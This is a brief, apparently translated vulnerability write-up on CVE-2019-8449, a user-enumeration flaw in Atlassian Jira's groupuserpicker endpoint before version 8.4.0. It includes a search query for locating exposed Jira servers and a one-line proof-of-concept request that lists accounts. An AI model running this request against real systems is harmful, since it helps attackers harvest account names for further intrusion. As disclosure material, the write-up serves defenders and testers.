Atlassian Jira Groupuserpicker User Information Enumeration Vulnerability Cve 2019 8449
Atlassian Jira Groupuserpicker User Information Enumeration Vulnerability Cve 2019 8449
Atlassian Jira groupuserpicker User Information Enumeration Vulnerability CVE-2019-8449
Vulnerability Description
The Atlassian Jira groupuserpicker interface has a user information enumeration vulnerability. Through the vulnerability, the attacker can obtain the user account name in the application to further penetrate.
Vulnerability Impact
Atlassian Jira <8.4.0
Network surveying and mapping
app=”ATLASSIAN-JIRA”
Vulnerability reappears
Login page
Verify POC
1
/rest/api/latest/groupuserpicker?query=admin&maxResults=50&showAvatar=false
When the user exists
When the user does not exist
This post is licensed under CC BY 4.0 by the author.